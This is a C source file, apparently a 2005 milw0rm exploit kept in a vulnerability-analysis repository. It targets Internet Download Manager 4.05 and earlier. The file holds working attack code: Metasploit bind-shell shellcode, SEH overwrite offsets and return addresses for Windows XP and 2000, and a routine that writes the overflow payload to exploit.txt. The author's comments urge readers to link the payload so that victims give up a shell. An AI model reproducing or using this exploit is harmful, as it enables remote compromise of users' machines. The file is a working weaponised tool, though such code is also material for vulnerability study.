lilbool/vuln-code-analysis
0
1/*
2
3 Title : Internet Download Manager =< 4.05 universal remote overflow Exploit
4 bug analyse and exploit code by : c0d3r "Kaveh Razavi" c0d3r@ihsteam.com
5 my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt
6
7 ************************************************************************
8
9 this bug is differnt from what was found in application called altnet
10 download manager .
11 if you read the code carefully you see that I left thingz for you .
12 well if you want to creat an html file linked to evil download offer
13 needed thingz are there , but in IE they are not usable cause exploit
14 string is bigger that IE input buffer .
15 I was analysing this bug and I was thinking about how to code an exploit
16 for this issue , then new Mozilla exploit came up ! yea the idea of saving
17 the exploit string into a file then copy/paste it to download manager
18 inpute url . there are other ways for sure . kiddies still can have fun
19 with this code just as I mentioned with a bit scripting in java or other
20 shits you can link exploit string which will be created in file exploit.txt
21 you can have a bad file , anyone using download manager can give a shell !
22 hint! : any other folder is being counted , so my suggestion is linking to
23 root webfolder .
24 sample usage shown in a 1 minute movie which can be downloaded at :
25 http://www.ihsteam.com/download/video/dlm.rar
26
27 ************************************************************************
28
29 Exploit method : Structured Exception Handling known as SEH .
30 Targets : should work on all win2000 and win xp's even sp2 ,
31 Tested : winxp sp 1 and win2000 server sp 4
32 compile : ms visual c++ 6 : cl dlm.c
33
34 ************************************************************************
35
36 Greetingz :
37
38 www.ihsteam.com LorD and NT , LorD always makes me happy with those
39 www.ihssecurity.com Nasa , berkely , stanford ,... shells :>
40 www.exploitdev.com yeah me and jamie are just started , u r0x jamie ,
41 www.metasploit.com fewer words better ones , great !
42 www.class101.org nice work is being done here ! class I used ur offsets :)
43 www.c0d3r.org my home ,nth here right now but those nice Essence words.
44 other Folks and friends not mentioned here .
45
46*/
47
48
49#include <stdio.h>
50#include <string.h>
51#include <windows.h>
52#define exploit "exploit.txt"
53#define NOP 0x90
54#define size 2519
55
56 int main(int argc,char **argv)
57{
58
59/*
60char crap1[]=
61"\x3C\x48\x45\x41\x44\x3E"
62"\x3C\x6D\x65\x74\x61\x20\x68\x74\x74\x70\x2D\x65"
63"\x71\x75\x69\x76\x3D\x22\x43\x6F\x6E\x74\x65\x6E"
64"\x74\x2D\x54\x79\x70\x65\x22\x20\x63\x6F\x6E\x74"
65"\x65\x6E\x74\x3D\x22\x74\x65\x78\x74\x2F\x68\x74"
66"\x6D\x6C\x3B\x20\x63\x68\x61\x72\x73\x65\x74\x3D"
67"\x69\x73\x6F\x2D\x38\x38\x35\x39\x2D\x31\x22\x3E"
68"\x3C\x6D\x65\x74\x61\x20\x68\x74\x74\x70\x2D\x65"
69"\x71\x75\x69\x76\x3D\x22\x72\x65\x66\x72\x65\x73"
70"\x68\x22\x20\x63\x6F\x6E\x74\x65\x6E\x74\x3D\x22"
71"\x33\x3B\x20\x55\x52\x4C\x3D";
72char crap2[]= "\x22\x3E";
73char crap3[]=
74"\x3C\x2F\x68\x65\x61\x64\x3E"
75"\x3C\x2F\x42\x4F\x44\x59\x3E"
76"\x3C\x2F\x48\x54\x4D\x4C\x3E";
77*/
78 char crap4[]= "\x31\x31\x2E";
79
80
81// metasploit shellc0de wow!!! LPORT=4444 Size=399
82 unsigned char shellcode[] =
83"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
84"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
85"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
86"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
87"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
88"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
89"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
90"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
91"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
92"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
93"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
94"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
95"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
96"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
97"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
98"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
99"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
100"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
101"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
102"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
103"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
104"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
105"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
106"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
107"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
108 FILE *fp;
109 char buffer[size];
110 unsigned int os;
111 char ppr[5];
112 char jmp[] = "\xEB\x0C\x90\x90";
113 char winxp[] = "\xB1\x2C\xC2\x77";
114 char win2000[] ="\x08\xB0\x01\x78";
115 if(argc < 2) {
116 printf("\n-------- Download Manager remote exploit\n");
117 printf("-------- copyrighted by c0d3r of IHS 2005\n");
118 printf("-------- usage : dlm.exe target\n");
119 printf("-------- target 1 : windows xp all service packs all languages : 0\n");
120 printf("-------- target 2 : windows 2000 all service packs all languages : 1\n");
121 printf("-------- eg : dlm.exe 0\n");
122 printf("-------- out file will be exploit.txt for windows xp\n\n");
123 exit(-1) ;
124 }
125 os = (unsigned short)atoi(argv[1]);
126 switch(os)
127 {
128 case 0:
129 strcat(ppr,winxp);
130 break;
131 case 1:
132 strcat(ppr,win2000);
133 break;
134 default:
135 printf("\n[-] this target doesnt exist in the list\n\n");
136
137 exit(-1);
138 }
139 printf("\n-------- Download Manager remote exploit\n");
140 printf("-------- copyrighted by c0d3r of IHS 2005\n");
141
142 // heart of exploit
143
144 printf("-------- building overflow string\n");
145 memset(buffer,NOP,size);
146 memcpy(buffer,crap4,sizeof(crap4)-1);
147 memcpy(buffer+3+2077,jmp,4);
148 memcpy(buffer+3+2077+4,ppr,4);
149 memcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);
150 buffer[size] = 0;
151
152 /*
153 memcpy(buffer,crap1,sizeof(crap1)-1);
154 memcpy(buffer+122,crap4,sizeof(crap4)-1);
155 memcpy(buffer+2192,jmp,4);
156 memcpy(buffer+2196,ppr,4);
157 memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);
158 memcpy(buffer+2599,crap2,sizeof(crap2)-1);
159 memcpy(buffer+2601,crap3,sizeof(crap3)-1);
160 buffer[size] = 0;
161 */
162
163 // EO heart of exploit
164
165 printf("-------- Done !\n");
166 printf("-------- Creating the exploit.txt file\n");
167 fp = fopen(exploit, "w+");
168 fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);
169 fclose(fp);
170 printf("-------- Done ! enjoy it !\n");
171 return 0;
172
173}
174
175// milw0rm.com [2005-07-06]